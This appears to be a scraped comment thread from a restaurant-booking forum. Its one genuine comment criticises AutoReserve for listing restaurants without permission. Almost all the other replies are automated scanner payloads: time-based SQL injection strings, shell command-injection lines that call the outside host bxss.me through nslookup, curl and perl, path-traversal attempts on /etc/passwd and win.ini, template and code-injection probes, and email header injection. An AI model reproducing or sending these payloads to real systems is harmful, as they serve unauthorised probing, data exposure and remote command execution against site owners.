|(nslookup -q=cname hitufcdqlughka6987.bxss.me||curl hitufcdqlughka6987.bxss.me)

1753894552

re: JJ

`(nslookup -q=cname hitzzvlsdnmse8144d.bxss.me||curl hitzzvlsdnmse8144d.bxss.me)`

1753894554

re: JJ

;(nslookup -q=cname hitqzssvdqfsj4cb43.bxss.me||curl hitqzssvdqfsj4cb43.bxss.me)|(nslookup -q=cname hitqzssvdqfsj4cb43.bxss.me||curl hitqzssvdqfsj4cb43.bxss.me)&(nslookup -q=cname hitqzssvdqfsj4cb43.bxss.me||curl hitqzssvdqfsj4cb43.bxss.me)

1753894555

re: JJ

|(nslookup${IFS}-q${IFS}cname${IFS}hitdcrowfslfc89a38.bxss.me||curl${IFS}hitdcrowfslfc89a38.bxss.me)

1753894556

re: JJ

&(nslookup${IFS}-q${IFS}cname${IFS}hitebuealubor937c7.bxss.me||curl${IFS}hitebuealubor937c7.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitebuealubor937c7.bxss.me||curl${IFS}hitebuealubor937c7.bxss.me)&`'

1753894558

re: JJ


8ZQKMead

1753894703

re: JJ


*1

1753894714

re: JJ


*1

1753894716

re: JJ


*1

1753894717

re: JJ


*1

1753894718

re: JJ

-1 OR 5*5=25 --

1753894718

re: JJ

-1 OR 5*5=26 --

1753894719

re: JJ

-1 OR 5*5=25

1753894720

re: JJ

-1 OR 5*5=26

1753894721

re: JJ


*if(now()=sysdate(),sleep(15),0)

1753894727

re: JJ


0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z

1753894733

re: JJ


0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z

1753894740

re: JJ

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1753894746

re: JJ


-1; waitfor delay '0:0:15' --

1753894752

re: JJ


-1); waitfor delay '0:0:15' --

1753894758

re: JJ


-1 waitfor delay '0:0:15' --

1753894765

re: JJ


VvbCZA48'; waitfor delay '0:0:15' --

1753894771

re: JJ


-1 OR 148=(SELECT 148 FROM PG_SLEEP(15))--

1753894777

re: JJ


-1) OR 878=(SELECT 878 FROM PG_SLEEP(15))--

1753894787

re: JJ


-1)) OR 626=(SELECT 626 FROM PG_SLEEP(15))--

1753894792

re: JJ


Ts8RCq3T' OR 302=(SELECT 302 FROM PG_SLEEP(15))--

1753894798

re: JJ


3oEHLyfK') OR 830=(SELECT 830 FROM PG_SLEEP(15))--

1753894805

re: JJ


aU2XuLdO')) OR 443=(SELECT 443 FROM PG_SLEEP(15))--

1753894812

re: JJ


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1753894820

re: JJ


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1753894826

re: JJ

'||(select 1 from (select pg_sleep(15))x)||'

1753894831

re: JJ

''||(select 1 from (select pg_sleep(15))x)||''

1753894837

re: JJ


'"

1753894839

re: JJ

@@fB8Qr

1753894840

re: JJ

(select 198766*667891)

1753894841

re: JJ

(select 198766*667891 from DUAL)

1753894843

I've never used it, but when I was booking some stuff a couple months back I noticed at least two places (can't remember which now) whose shops had AutoReserve pages said explicitly on their website that they would not accept AutoReserve. So (i) I guess the shops aren't too impressed with it either (haha) and (ii) I generally take a dim view of companies that list restaurants on their site without permission. Reminds me of the situation here in the U.S. where delivery apps will list restaurants on their sites (with the associated obscene cuts of the revenue) without ever getting permission from the restaurant itself.

1680634389 Reply
Add photos

re: mirugai

Fa1rpfNK

1697002538

re: mirugai

1*

1697002538

re: mirugai

1*

1697002538

re: mirugai

1*

1697002539

re: mirugai

1*

1697002539

re: mirugai

-1 OR 2+527-527-1=0+0+0+1

1697002539

re: mirugai

-1 OR 3+527-527-1=0+0+0+1

1697002539

re: mirugai

if(now()=sysdate(),sleep(15),0)

1697002543

re: mirugai

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002549

re: mirugai

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002554

re: mirugai

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002559

re: mirugai

-1; waitfor delay '0:0:15' --

1697002563

re: mirugai

-1); waitfor delay '0:0:15' --

1697002568

re: mirugai

1 waitfor delay '0:0:15' --

1697002573

re: mirugai

DbGkXblK'; waitfor delay '0:0:15' --

1697002577

re: mirugai

-5 OR 481=(SELECT 481 FROM PG_SLEEP(15))--

1697002582

re: mirugai

q0spgWkk

1697002583

re: mirugai

1*

1697002583

re: mirugai

1*

1697002584

re: mirugai

1*

1697002584

re: mirugai

1*

1697002584

re: mirugai

-1 OR 2+595-595-1=0+0+0+1

1697002584

re: mirugai

-1 OR 3+595-595-1=0+0+0+1

1697002585

re: mirugai

-5) OR 536=(SELECT 536 FROM PG_SLEEP(15))--

1697002586

re: mirugai

if(now()=sysdate(),sleep(15),0)

1697002589

re: mirugai

-1)) OR 789=(SELECT 789 FROM PG_SLEEP(15))--

1697002590

re: mirugai

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002593

re: mirugai

rmqL53ty' OR 198=(SELECT 198 FROM PG_SLEEP(15))--

1697002595

re: mirugai

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002598

re: mirugai

H2EEREAj') OR 387=(SELECT 387 FROM PG_SLEEP(15))--

1697002600

re: mirugai

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002602

re: mirugai

kWSxSl86')) OR 94=(SELECT 94 FROM PG_SLEEP(15))--

1697002604

re: mirugai

-1; waitfor delay '0:0:15' --

1697002607

re: mirugai


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002609

re: mirugai

-1); waitfor delay '0:0:15' --

1697002612

re: mirugai


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002615

re: mirugai

1 waitfor delay '0:0:15' --

1697002617

re: mirugai

'||(select 1 from (select pg_sleep(15))x)||'

1697002619

re: mirugai

FAk2VVkd'; waitfor delay '0:0:15' --

1697002621

re: mirugai

''||(select 1 from (select pg_sleep(15))x)||''

1697002623

re: mirugai

1'"

1697002623

re: mirugai

@@TkNLW

1697002624

re: mirugai

-5 OR 462=(SELECT 462 FROM PG_SLEEP(15))--

1697002625

re: mirugai

-5) OR 750=(SELECT 750 FROM PG_SLEEP(15))--

1697002629

re: mirugai

-1)) OR 688=(SELECT 688 FROM PG_SLEEP(15))--

1697002634

re: mirugai

N4hkxoiD' OR 138=(SELECT 138 FROM PG_SLEEP(15))--

1697002639

re: mirugai

HTPbdLJj') OR 243=(SELECT 243 FROM PG_SLEEP(15))--

1697002643

re: mirugai

tALAVFO4')) OR 43=(SELECT 43 FROM PG_SLEEP(15))--

1697002647

re: mirugai


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002652

re: mirugai


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002659

re: mirugai

'||(select 1 from (select pg_sleep(15))x)||'

1697002663

re: mirugai

''||(select 1 from (select pg_sleep(15))x)||''

1697002667

re: mirugai

1'"

1697002668

re: mirugai

@@Q5O6x

1697002669

re: mirugai

1MbbLEkrO

1727140540

re: mirugai

response.write(9979195*9016172)

1727140544

re: mirugai

'+response.write(9979195*9016172)+'

1727140545

re: mirugai

<esi:include src="http://bxss.me/rpb.png"/>

1727140545

re: mirugai

${10000429+9999663}

1727140545

re: mirugai

"+response.write(9979195*9016172)+"

1727140546

re: mirugai

%0abcc:074625.67-13555.67.df552.19990.2@bxss.me

1727140546

re: mirugai

to@example.com>%0d%0abcc:074625.67-13556.67.df552.19990.2@bxss.me

1727140547

re: mirugai

../../../../../../../../../../../../../../etc/passwd

1727140550

re: mirugai

../../../../../../../../../../../../../../windows/win.ini

1727140551

re: mirugai

file:///etc/passwd

1727140552

re: mirugai

'.gethostbyname(lc('hitxi'.'smgyzjdl57ef5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(86).chr(114).chr(82).'

1727140552

re: mirugai

)

1727140552

re: mirugai

../../../../../../../../../../../../../../../proc/version

1727140552

re: mirugai

".gethostbyname(lc("hityj"."nwetgdbme2875.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(86).chr(108).chr(71)."

1727140553

re: mirugai

!(()&&!|*|*|

1727140553

re: mirugai

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727140553

re: mirugai

^(#$!@#$)(()))******

1727140554

re: mirugai

../../../../../../../../../../etc/passwd%00.jpg

1727140554

re: mirugai

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727140555

re: mirugai

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727140556

re: mirugai

echo xfelgt$()\ ycgrmq\nz^xyu||a #' &echo xfelgt$()\ ycgrmq\nz^xyu||a #|" &echo xfelgt$()\ ycgrmq\nz^xyu||a #

1727140556

re: mirugai

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727140557

re: mirugai

&echo zbmakb$()\ vtzppg\nz^xyu||a #' &echo zbmakb$()\ vtzppg\nz^xyu||a #|" &echo zbmakb$()\ vtzppg\nz^xyu||a #

1727140557

re: mirugai

/etc/passwd

1727140557

re: mirugai

|echo ehifdq$()\ xojrry\nz^xyu||a #' |echo ehifdq$()\ xojrry\nz^xyu||a #|" |echo ehifdq$()\ xojrry\nz^xyu||a #

1727140557

1727140558

re: mirugai

"+"A".concat(70-3).concat(22*4).concat(108).concat(84).concat(121).concat(85)+(require"socket"
Socket.gethostbyname("hitks"+"ksuhoqirb6a28.bxss.me.")[3].to_s)+"

1727140558

re: mirugai

%2fetc%2fpasswd

1727140558

re: mirugai

(nslookup hitirokncmvir46b7e.bxss.me||perl -e "gethostbyname('hitirokncmvir46b7e.bxss.me')")

1727140558

re: mirugai

bxss.me/t/xss.html?%00

1727140559

re: mirugai

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727140559

re: mirugai

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727140559

re: mirugai

'+'A'.concat(70-3).concat(22*4).concat(121).concat(67).concat(114).concat(84)+(require'socket'
Socket.gethostbyname('hitha'+'lomughgk5319f.bxss.me.')[3].to_s)+'

1727140559

re: mirugai

/.././.././.././.././.././.././.././../etc/./passwd%00

1727140559

re: mirugai

$(nslookup hitukyuzbtuou4bb98.bxss.me||perl -e "gethostbyname('hitukyuzbtuou4bb98.bxss.me')")

1727140559

1727140560

re: mirugai

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727140560

re: mirugai

&nslookup hitzqaxvktexxa02d2.bxss.me&'\"`0&nslookup hitzqaxvktexxa02d2.bxss.me&`'

1727140561

re: mirugai

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727140561

1727140561

re: mirugai

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727140561

re: mirugai

&(nslookup hitmokypnzigh77ff4.bxss.me||perl -e "gethostbyname('hitmokypnzigh77ff4.bxss.me')")&'\"`0&(nslookup hitmokypnzigh77ff4.bxss.me||perl -e "gethostbyname('hitmokypnzigh77ff4.bxss.me')")&`'

1727140562

re: mirugai

';print(md5(31337));$a='

1727140562

re: mirugai

/etc/shells

1727140562

re: mirugai

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727140562

re: mirugai

|(nslookup hitmcbecijwkn03691.bxss.me||perl -e "gethostbyname('hitmcbecijwkn03691.bxss.me')")

1727140563

re: mirugai

c:/windows/win.ini

1727140563

re: mirugai

";print(md5(31337));$a="

1727140563

re: mirugai

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727140563

re: mirugai

`(nslookup hitlxmsmjmuvlab335.bxss.me||perl -e "gethostbyname('hitlxmsmjmuvlab335.bxss.me')")`

1727140563

re: mirugai

'"

1727140563

re: mirugai

bxss.me

1727140564

re: mirugai

${@print(md5(31337))}

1727140564

re: mirugai

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727140564

re: mirugai

;(nslookup hithevywtcnas81616.bxss.me||perl -e "gethostbyname('hithevywtcnas81616.bxss.me')")|(nslookup hithevywtcnas81616.bxss.me||perl -e "gethostbyname('hithevywtcnas81616.bxss.me')")&(nslookup hithevywtcnas81616.bxss.me||perl -e "gethostbyname('hithevywtcnas81616.bxss.me')")

1727140564

re: mirugai

<!--

1727140564

re: mirugai

${@print(md5(31337))}\

1727140565

re: mirugai

file:///etc/passwd

1727140565

re: mirugai

'.print(md5(31337)).'

1727140566

re: mirugai

/\../\../\../\../\../\../\../etc/passwd

1727140566

re: mirugai

/WEB-INF/web.xml

1727140567

re: mirugai

C:\WINDOWS\system32\drivers\etc\hosts

1727140568

re: mirugai

../../../../../../../../../../windows/win.ini%00.jpg

1727140569

re: mirugai

/../../../../../../../../../../boot.ini

1727140570

re: mirugai

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727140571

re: mirugai

..\..\..\..\..\..\..\..\windows\win.ini

1727140572

re: mirugai

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727140573

re: mirugai

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727140574

re: mirugai

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727140575

re: mirugai

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727140576

re: mirugai

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727140577

re: mirugai

WEB-INF/web.xml

1727140578

re: mirugai

WEB-INF\web.xml

1727140579

re: mirugai

1

1727140974

re: mirugai

1

1727140985

re: mirugai

-1 OR 2+511-511-1=0+0+0+1 --

1727140986

re: mirugai

-1 OR 3+511-511-1=0+0+0+1 --

1727140987

re: mirugai

-1 OR 2+535-535-1=0+0+0+1

1727140987

re: mirugai

-1 OR 3+535-535-1=0+0+0+1

1727140988

re: mirugai

-1' OR 2+425-425-1=0+0+0+1 --

1727140988

re: mirugai

-1' OR 3+425-425-1=0+0+0+1 --

1727140989

re: mirugai

-1' OR 2+384-384-1=0+0+0+1 or 'nkBUnyV9'='

1727140989

re: mirugai

-1' OR 3+384-384-1=0+0+0+1 or 'nkBUnyV9'='

1727140989

re: mirugai

-1" OR 2+398-398-1=0+0+0+1 --

1727140990

re: mirugai

-1" OR 3+398-398-1=0+0+0+1 --

1727140990

re: mirugai

if(now()=sysdate(),sleep(15),0)

1727141001

re: mirugai

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727141013

re: mirugai

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727141026

re: mirugai

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727141041

re: mirugai

-1; waitfor delay '0:0:15' --

1727141055

re: mirugai

-1); waitfor delay '0:0:15' --

1727141070

re: mirugai

1 waitfor delay '0:0:15' --

1727141084

re: mirugai

5lRS7Jzu'; waitfor delay '0:0:15' --

1727141100

re: mirugai

-5 OR 306=(SELECT 306 FROM PG_SLEEP(15))--

1727141119

re: mirugai

-5) OR 792=(SELECT 792 FROM PG_SLEEP(15))--

1727141136

re: mirugai

-1)) OR 782=(SELECT 782 FROM PG_SLEEP(15))--

1727141152

re: mirugai

yyUpVaQd' OR 989=(SELECT 989 FROM PG_SLEEP(15))--

1727141170

re: mirugai

RToHKyDP') OR 653=(SELECT 653 FROM PG_SLEEP(15))--

1727141188

re: mirugai

tfYkmyfa')) OR 34=(SELECT 34 FROM PG_SLEEP(15))--

1727141205

re: mirugai

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141223

re: mirugai

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141238

re: mirugai

'||(select 1 from (select pg_sleep(15))x)||'

1727141255

re: mirugai

''||(select 1 from (select pg_sleep(15))x)||''

1727141269

re: mirugai

1'"

1727141269

re: mirugai

@@5BSix

1727141272

re: mirugai

1

1727383026

re: mirugai

1

1727383026

re: mirugai

1

1727383026

re: mirugai

1

1727383579

re: mirugai

1

1727383580

re: mirugai

1

1727383580

re: mirugai

1HLQMTTTV0

1753894540

re: mirugai

response.write(9442265*9531645)

1753894547

re: mirugai


<esi:include src="http://bxss.me/rpb.png"/>

1753894548

re: mirugai

'+response.write(9442265*9531645)+'

1753894548

re: mirugai

"+response.write(9442265*9531645)+"

1753894550

re: mirugai

${10000166+9999646}

1753894553

re: mirugai

../../../../../../../../../../../../../../etc/passwd

1753894555

re: mirugai

../../../../../../../../../../../../../../windows/win.ini

1753894556

re: mirugai

file:///etc/passwd

1753894557

re: mirugai

redirtest.acx

1753894558

re: mirugai

)

1753894560

re: mirugai

../

1753894560

re: mirugai

!(()&&!|*|*|

1753894561

re: mirugai

^(#$!@#$)(()))******

1753894562

re: mirugai

'.gethostbyname(lc('hitse'.'hbaspgknde6d3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(77).chr(106).chr(73).'

1753894564

re: mirugai

".gethostbyname(lc("hitiy"."bewpkmdv2447d.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(89).chr(100).chr(68)."

1753894565

re: mirugai

ctime
sleep
p0
(I30
tp1
Rp2
.

1753894566

re: mirugai

gethostbyname(lc('hitsv'.'ldquaeeo66af2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(77).chr(97).chr(86)

1753894566

1753894573

1753894573

re: mirugai

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

1753894575

re: mirugai

bxss.me/t/xss.html?%00

1753894575

re: mirugai

/etc/shells

1753894576

re: mirugai

"+"A".concat(70-3).concat(22*4).concat(118).concat(69).concat(108).concat(88)+(require"socket"
Socket.gethostbyname("hitxv"+"peudsgwv30d7f.bxss.me.")[3].to_s)+"

1753894577

re: mirugai

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1753894578

re: mirugai

../../../../../../../../../../../../../../etc/shells

1753894578

re: mirugai

'"

1753894578

re: mirugai

'+'A'.concat(70-3).concat(22*4).concat(103).concat(69).concat(117).concat(78)+(require'socket'
Socket.gethostbyname('hitjo'+'cgygjltx7aa47.bxss.me.')[3].to_s)+'

1753894579

re: mirugai

';print(md5(31337));$a='

1753894579

re: mirugai

c:/windows/win.ini

1753894579

re: mirugai

<!--

1753894579

re: mirugai

'A'.concat(70-3).concat(22*4).concat(110).concat(65).concat(110).concat(75)+(require'socket'
Socket.gethostbyname('hitxr'+'iezblgtsa44d2.bxss.me.')[3].to_s)

1753894580

re: mirugai

replies

1753894580

re: mirugai

";print(md5(31337));$a="

1753894580

re: mirugai

bxss.me

1753894581

re: mirugai

echo ukxgfa$()\ ouxpca\nz^xyu||a #' &echo ukxgfa$()\ ouxpca\nz^xyu||a #|" &echo ukxgfa$()\ ouxpca\nz^xyu||a #

1753894581

re: mirugai

replies

1753894582

re: mirugai

${@print(md5(31337))}

1753894582

1753894582

